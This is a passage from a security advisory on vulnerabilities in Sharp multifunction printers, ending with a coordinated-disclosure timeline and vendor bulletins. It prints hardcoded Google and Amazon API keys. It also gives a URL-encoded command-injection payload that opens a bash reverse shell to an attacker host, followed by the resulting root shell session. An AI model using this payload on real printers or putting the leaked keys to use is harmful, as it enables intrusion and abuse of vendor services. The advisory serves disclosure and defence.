6458d562.357033a1 0x7fe7273fe6c0 0010: 64 6f 6d 61 69 6e 2e 6c61 2e 2e 50 41 53 53 57 domain.la..PASSW 6458d562.35704d44 0x7fe7273fe6c0 0020: 4f 52 44 2d 49 4e 2d 434c 45 41 52 ORD-IN-CLEAR 6458d562.357231ef 0x7fe7273fe6c0 ldap_read: want=8 error=Resourcetemporarily unavailableIt is also possible to use wireshark to display the password.## Details - Hardcoded Google API KeysThe printers contain private API Keys in the `main` program.It is possible to retrieve specific googlecontent.com domain names inthe main program:[please use the HTML version athttps://pierrekim.github.io/blog/2024-06-27-sharp-mfp-17-vulnerabilities.html]Reverse Engineering of the `sub_2146D54()` function defined in themain program will reveal some hardcoded keys:[please use the HTML version athttps://pierrekim.github.io/blog/2024-06-27-sharp-mfp-17-vulnerabilities.html][please use the HTML version athttps://pierrekim.github.io/blog/2024-06-27-sharp-mfp-17-vulnerabilities.html]The domains listed in the binary are:- - 265490466885-m5cjvglv9q8aak493cgepe7juvafgh8c.apps.googleusercontent.com- - 347970444986-0pij6u2tfhb240edjmls3h1u8qm2v2b3.apps.googleusercontent.com- - 410988772526-6ujegl6jvquh9kstiegva8fk5j2ogag9.apps.googleusercontent.com- - 292646726735-033ggn9hmlrs8bntrj0fbstob9m8qt26.apps.googleusercontent.comThese domains do not appear to be used anymore and are free for anyuser. An attacker can use them to receive traffic from the printers.## Details - Hardcoded Amazon API KeysThe printers contain private API Keys in the `main` program.It is possible to retrieve a specific amazonaws.com address in the`main` program:- - https://7db3z5d116.execute-api.ap-northeast-1.amazonaws.com/prod/MFPDataAlalyticsWhen Cross-referencing this address, it appears that some private APIkeys are hardcoded in the program, as shown below:- - Postman private key: `44688039-5104-39be-f974-c1f5ef621a5f`- - API-KEY: `PBYXSIK6av8fBt8Qe1EQUaF9ZaKvTDutaXS9YwWA`Reverse Engineering of the sub_20D542C function defined in the `main` program:[please use the HTML version athttps://pierrekim.github.io/blog/2024-06-27-sharp-mfp-17-vulnerabilities.html][please use the HTML version athttps://pierrekim.github.io/blog/2024-06-27-sharp-mfp-17-vulnerabilities.html]We can see that curl is invoked with the `-k` option (aka`--insecure`) so any invalid SSL certificate will be accepted:The pseudo-code of `sub_20D542C()` is: int __fastcall sub_20D542C(const char *a1, const char *a2) { ... if ( sub_6A0DA0(606420, 0) ) { sub_6A174C((char *)&loc_940DC + 2, v4, 255); sub_6A174C((char *)&loc_940DC + 3, v6, 80); sub_6A174C(606432, v7, 80); if ( !*v6 ) j_strncpy_0(v6, "user", 0x50u); v11 = sub_6A107C(&loc_940E8, 3080); j_snprintf( v9, 0x800u, "/usr/bin/curl -k -o %s -U %s:%s -x %s:%d -X POST -d@\"%s\" -H \"x-api-key: PBYXSIK6av8fBt8Qe1EQUaF9ZaKvTDut" "aXS9YwWA\" -H \"Cache-Control: no-cache\" -H\"Postman-Token: 44688039-5104-39be-f974-c1f5ef621a5f\" -L \"%s\"", a2, v6, v7, v4, v11, a1,"https://7db3z5d116.execute-api.ap-northeast-1.amazonaws.com/prod/MFPDataAlalytics"); sub_20D7E20( "[analy][curl] /usr/bin/curl -k -o %s -U %s:xxx -x%s:%d -X POST -d @\"%s\" -H \"x-api-key: PBYXSIK6av8fBt8Q" "e1EQUaF9ZaKvTDutaXS9YwWA\" -H \"Cache-Control:no-cache\" -H \"Postman-Token: 44688039-5104-39be-f974-c1f5ef" "621a5f\" -L \"%s\"\n", a2, v6, v4, v11, a1,"https://7db3z5d116.execute-api.ap-northeast-1.amazonaws.com/prod/MFPDataAlalytics"); } else { j_snprintf( v9, 0x800u, "/usr/bin/curl -k -o %s -X POST -d @\"%s\" -H\"x-api-key: PBYXSIK6av8fBt8Qe1EQUaF9ZaKvTDutaXS9YwWA\" -H \"Ca" "che-Control: no-cache\" -H \"Postman-Token:44688039-5104-39be-f974-c1f5ef621a5f\" -L \"%s\"", a2, a1,"https://7db3z5d116.execute-api.ap-northeast-1.amazonaws.com/prod/MFPDataAlalytics"); sub_20D7E20( "[analy][curl] /usr/bin/curl -k -o %s -X POST -d@\"%s\" -H \"x-api-key: PBYXSIK6av8fBt8Qe1EQUaF9ZaKvTDutaXS9" "YwWA\" -H \"Cache-Control: no-cache\" -H\"Postman-Token: 44688039-5104-39be-f974-c1f5ef621a5f\" -L \"%s\"\n", a2, a1,"https://7db3z5d116.execute-api.ap-northeast-1.amazonaws.com/prod/MFPDataAlalytics"); } v12 = j_mfp_system((int)v9);## Details - CVE-2022-45796 - RCESince the PoC for CVE-2022-45796 was not public, an authenticatedadmin user can go to http://ip/nw_interface.html and use the IPv6 IPfield to exploit a command injection:[please use the HTML version athttps://pierrekim.github.io/blog/2024-06-27-sharp-mfp-17-vulnerabilities.html][please use the HTML version athttps://pierrekim.github.io/blog/2024-06-27-sharp-mfp-17-vulnerabilities.html]Using Burp, an attacker can intercept the resulting request and injecta command inside the vulnerable `ggt_textbox(16)` field, for example,`ggt_textbox%2816%29=%7Cbash+-i+%3E%26+%2Fdev%2Ftcp%2Fattacker_ip%2F443+0%3E%261`corresponding to the payload `|bash -i /dev/tcp/attacker_ip/443 0>&1`.The attacker will receive a root shell from the printers and will geta full admin access, allowing to backdoor the printer for persistence: kali% nc -l -v -p 443 listening on [any] 443 ... 10.0.0.1: inverse host lookup failed: Unknown host connect to [10.0.0.10] from (UNKNOWN) [10.0.0.1] 58196 bash: cannot set terminal process group (619): Inappropriate ioctlfor device bash: no job control in this shell bash-4.3# id uid=0(root) gid=0(root) groups=0(root) bash-4.3# uname -ap Linux SC58C36B 4.1.46-rt52 #2 SMP PREEMPT RT Fri Apr 26 12:29:16JST 2019 aarch64 GNU/Linux bash-4.3# ps -auxww | grep ping root 5022 0.0 0.0 1916 368 ? S 09:34 0:00 grep ping root 28966 0.0 0.0 2876 1940 ? S 09:33 0:00sh -c ping6 -c 1 -W 2 |bash -i >& /dev/tcp/10.0.0.10/443 0>&1 bash-4.3# init-+-aarch64-fsl-lin |-access_audit_mg |-bcr_iface |-blackscreen_mon |-check_hash_daem |-cmd_proc |-cpu_state |-dbus-daemon |-dout_daemon---14*[{dout_daemon}] |-dummy_init |-getty |-intsrt |-linter |-mgrcpuif_r1b---2*[{mgrcpuif_r1b}] |-mgrcpuif_r1c---2*[{mgrcpuif_r1c}] |-nfcproc---7*[{nfcproc}] |-ocrsrv---21*[{ocrsrv}] |-oom_watch |-poff_reboot |-pulseaudio---{null-sink} |-rc---S998linuxApp-+-IFS---20*[{IFS}] | |-main-+-preview---48*[{preview}] | | |-sxlinklocald | | `-514*[{main}] | |-netp---netp---sh---bash---pstree | |-pdl---43*[{pdl}] | |-reus_lcd_mgr---{reus_lcd_mgr} | |-rtc_manager---{rtc_manager} | |-2*[seriallink---6*[{seriallink}]] | |-sound_play-+-14*[{sound_play}] | | `-{threaded-ml} | |-startx---xinit-+-X | | `-sh-+-NX---7*[{NX}] | ||-ui_mainview---12*[{ui_mainview}] | |`-ui_subview---7*[{ui_subview}] | |-usbch_mgr | |-vmstat | |-watch_proc | `-wlctlproc---6*[{wlctlproc}] |-2*[rotate] |-rsyslogd-+-{in:imklog} | |-{in:immark} | |-{in:imuxsock} | `-{rs:main Q:Reg} |-system_reset---6*[{system_reset}] `-udevd---2*[udevd] bash-4.3### Vendor ResponseJPCERT provided a security bulletin:https://jvn.jp/en/vu/JVNVU93051062/index.html.Sharp provided a security bulletin:https://global.sharp/products/copier/info/info_security_2024-05.html.Toshiba provided a security bulletin:https://www.toshibatec.com/information/20240531_02.html.## Report Timeline* May 2023: Security assessment performed on Sharp Multi-function printers.* June 1, 2023: A complete report was sent to JPCERT (security contactfor Sharp).* June 6, 2023: JPCERT aknowledged the reception of the securityassessment and asked more information about the security contact.* June 7, 2023: Information about the security contact provided to JPCERT.* June 7, 2023: JPCERT confirmed the reception of the security contact.* Jul 17, 2023: Questions sent to JPCERT asking for any feedback from Sharp.* Jul 18, 2023: JPCERT confirmed that they had a meeting with Sharp aweek ago. Sharp finished the investigation and was preparing adocument listing all the issues.* Jul 25, 2023: JPCERT provided the Excel file with Sharp's comments.* Jul 26, 2023: I confirmed the reception of the documents* Jul 28, 2023: Comments sent to JPCERT in the Excel file to ask tore-evaluate some issues.* Aug 1, 2023: Received responses from JPCERT regarding some of the issues.* Aug 1, 2023: Additional information provided to JPCERT regarding apotential disclosure of vulnerabilities if the issues are not patched.I suggested a tripartite meeting with Sharp and JPCERT to review theissues.* Aug 2, 2023: JPCERT suggested solutions to get security patches in atimely manner by prioritizing issues.* Aug 3, 2023: Agreed with JPCERT to prioritize vulnerabilities basedon severity, then patch critical vulnerabilities as soon as possiblewhile delaying hard-to-fix vulnerabilities.* Aug 4, 2023: JPCERT confirmed that they are working with Sharp toget the issues fixed.* Aug 16, 2023: JPCERT confirmed that they asked Sharp to reconsidersome of the issues with two buckets (short-term fixes and long-termcountermeasures) and that Sharp was working on the issues.* Sep 13, 2023: I answered that it is an acceptable practice, sinceshort-term fixes and long-term countermeasures are currently beingimplemented by other printer vendors.* Sep 14, 2023: JPCERT confirmed that they are working with Sharp toget security patches.* Oct 10, 2023: I confirmed the reception of the updates.* Nov 16, 2023: JPCERT provided a new Excel file with the issues andthe countermeasures provided by Sharp.* Nov 21, 2023: Excel file was reviewed and Sharp suggested to patchvulnerable code and remove vulnerable features.* Jan 29, 2024: Asking about the status of the vulnerabilities (CVE,availability of security patches).* Jan 30, 2024: JPCERT confirmed that a JVN advisory will be publishedwith corresponding CVEs. Security patches will be provided by May2024.* Jan 30, 2024: I suggested to test patched firmware images to confirmthat vulnerabilities were correctly patched.* Jan 31, 2024: JPCERT passed the message to Sharp regardingadditional tests of patched firmware images.* Feb 16, 2024: JPCERT sent the updated Excel file containing thevulnerabilities.* Feb 16, 2024: Confirmation of the reception of the Excel file.* Feb 20, 2024: Updated Excel file sent to JPCERT with my comments.* Mar 1, 2024: JPCERT sent comments regarding my feedbacks.* Mar 4, 2024: I confirmed the reception of the feedbacks.* May 8, 2024: Email asking JPCERT when the security advisories andsecurity patches will be published.* May 16, 2024: JPCERT sent a list of affected products/versions andconfirmed that they are working on a draft.* May 20, 2024: I suggested to include unsupported models since, basedon my testing, some unsupported models were vulnerable.* May 21, 2024: JPCERT reported sending this suggestion to Sharp.* May 28, 2024: JPCERT provided the JVN English edition draftadvisory, the final list of affected products and Toshiba Tech MFPsinformation.* May 28, 2024: I asked JPCERT to provide me with the list of CVEs forthe list of vulnerabilities I reported.* May 29, 2024: JPCERT provided a list of vulnerabilities along withCVEs and clarifications regarding some of the findings.* May 30, 2024: Confirmation sent to JPCERT that the list was received.* May 31, 2024: JPCERT published a security advisory:https://jvn.jp/en/vu/JVNVU93051062/index.html.* May 31, 2024: Sharp published a security advisory:https://global.sharp/products/copier/info/info_security_2024-05.html.* May 31, 2024: Toshiba published a security advisory:https://www.toshibatec.com/information/20240531_02.html.* June 27, 2024: A security advisory is published.## CreditsThese vulnerabilities were found by Pierre Barre aka Pierre Kim (@PierreKimSec).## Referenceshttps://pierrekim.github.io/blog/2024-06-27-sharp-mfp-17-vulnerabilities.htmlhttps://pierrekim.github.io/advisories/2024-sharp-mfp.txthttps://jvn.jp/en/vu/JVNVU93051062/index.htmlhttps://global.sharp/products/copier/info/info_security_2024-05.htmlhttps://www.toshibatec.com/information/20240531_02.html## DisclaimerThis advisory is licensed under a Creative Commons Attribution Non-CommercialShare-Alike 3.0 License: http://creativecommons.org/licenses/by-nc-sa/3.0/-----BEGIN PGP SIGNATURE-----iQIzBAEBCgAdFiEEoSgI9MSrzxDXWrmCxD4O2n2TLbwFAmZ9pYoACgkQxD4O2n2TLbx2Iw//TIRFzVnpQwVpk/SHRg/f7MHlQmTeSmXTJiataDytUiio8OtfWpkAHLy6KTPW0XHxkGBrndZbeay/hmyDHKH5yrhrzF/OqXHetZVDKx7bzFBAkFTeuPQdgyv4xQmfmv3DbvSrfCXMnNTMvh4XE1JT4l4Ng4fbOxx3x5s7cgBKpsw5QO045nsrWmIN9L9mqY3h6o0lmcPt04HO/Th1sREbNeeSzg6S5jwdM77ZZQkXg6NQ3Fob+RJkd2oKtJJF3t48j1aIVRoW/RAaxL0bkzbxnWC0OSKYmGSNKGlXsmpQ6BNf5baLl4ursSO/iIeVYhIgLNIL0NwbInbDWIBsDjEVpAh74BDBrHAafzLryPYZUL+jBw0CkJxUkyxgHbR/AbpHe+aXR6semM1E3pWmu2Z3Z1qGUIef+NULYUHPIpSNFqQ9sfQmzStRvz1zunFOhjuOMlMFoPcDa3eL/iJOl64fNE/tu4Qi+ytt8gyy6sEFj0ZOXLJMNBg30E+saRdE+eAiVVp+/Pj+O4+YGYtUzwNyW2RgdLtAXihBVzFlprSA/26scNog39zgxPQ+M7qjcVCxFvoL6kKvf/Y0aDvXT27Z+yV5G5l3v29XbB77az+i5TzA9d9LSfcZv6+rH5tsJlPs6r65uRi3JGNDBTnkW85UENOwpnwLiCrYJwhrExUjky0==cwDH-----END PGP SIGNATURE------- Pierre [email protected]@PierreKimSechttps://pierrekim.github.io/
Related news
CVE-2022-45796: Sharp Corporation
Command injection vulnerability in nw_interface.html in SHARP multifunction printers (MFPs)'s Digital Full-color Multifunctional System 202 or earlier, 120 or earlier, 600 or earlier, 121 or earlier, 500 or earlier, 402 or earlier, 790 or earlier, and Digital Multifunctional System (Monochrome) 200 or earlier, 211 or earlier, 102 or earlier, 453 or earlier, 400 or earlier, 202 or earlier, 602 or earlier, 500 or earlier, 401 or earlier allows remote attackers to execute arbitrary commands via unspecified vectors.